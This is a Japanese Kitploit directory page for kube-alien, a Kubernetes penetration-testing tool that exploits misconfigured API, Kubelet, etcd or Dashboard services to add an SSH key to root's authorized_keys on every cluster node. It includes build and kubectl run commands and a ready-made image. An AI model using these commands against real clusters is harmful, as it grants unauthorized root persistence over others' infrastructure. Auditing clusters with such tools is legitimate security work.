Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
kube-alien — 自動化されたKubernetesクラスター侵入テストツール。API、Kubelet、etcd、Dashboardの設定ミスを悪用し、ポッド内からSSHキーを注入してノードを乗っ取ります。 | Kitploit
ツール/GitHubGitHub/nixwizard/kube-alien
コンテナセキュリティエクスプロイトペネトレーションテストクラウドセキュリティ設定ミス
GitHubnixwizard/kube-alien

kube-alien

自動化されたKubernetesクラスター侵入テストツール。API、Kubelet、etcd、Dashboardの設定ミスを悪用し、ポッド内からSSHキーを注入してノードを乗っ取ります。

リポジトリを見る
2525年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Kube-alien

このツールは、k8sクラスター内部から攻撃を仕掛けます。つまり、実行するにはクラスター内にPodをデプロイする権限を持つアクセスがすでに必要です。kube-alien Podを実行すると、このイメージ(https://github.com/nixwizard/dockercloud-authorizedkeys)を使用して、ノードの /root/.ssh/authorized_keys ファイルにあなたの公開鍵を追加することで、クラスターのノードを乗っ取ろうとします。このイメージは docker/dockercloud-authorizedkeys からフォークされており、config.py の ADD_AUTHKEYS_IMAGE パラメータで調整可能です。 攻撃が成功するのは、クラスターのコンポーネントのいずれかに設定ミスがあり、以下のベクトルに沿って進む場合です。

  • Kubernetes API
  • Kubelet サービス
  • Etcd サービス
  • Kubernetes-Dashboard

このツールの目的は何ですか?

  • k8sクラスターのセキュリティ監査中に、そのセキュリティ態勢を迅速に評価することができます。
  • 前述の攻撃ベクトルの悪用を部分的に実演します。

実際の環境でk8sクラスターが内部からどのように攻撃される可能性がありますか?

  • クラスター内のPodで実行されているアプリケーションのRCEまたはSSRFの脆弱性。

使用方法

このツールを使用する前に、Kube-alienイメージをDockerHub(または他のレジストリ)にプッシュする必要があります。

root@kitploit:~
git clone https://github.com/nixwizard/kube-alien.git
cd kube-alien
docker build -t ka ./
docker tag ka YOUR_DOCKERHUB_ACCOUNT/kube-alien
docker push YOUR_DOCKERHUB_ACCOUNT/kube-alien

AUTHORIZED_KEYS 環境変数は、SSH公開鍵の値に設定する必要があります。成功した場合、公開鍵はすべてのノードのrootの authorized_keys ファイルに追加されます。

root@kitploit:~
kubectl run --image=YOUR_DOCKERHUB_ACCOUNT/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

または、クイックテスト用に私のイメージを使用することもできます。

root@kitploit:~
kubectl run --image=nixwizard/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

Kube-alien Podのログを確認して、攻撃が成功したかどうかを確認します。

root@kitploit:~
kubectl logs $(kubectl get pods| grep alien|cut -f1 -d' ')

このツールの作成に役立ったリソース

  • https://www.youtube.com/watch?v=vTgQLzeBfRU
  • https://www.youtube.com/watch?v=dxKpCO2dAy8 (および https://raesene.github.io にあるKubernetes攻撃面に関するその他の素晴らしい投稿)
  • https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c
ツールをダウンロード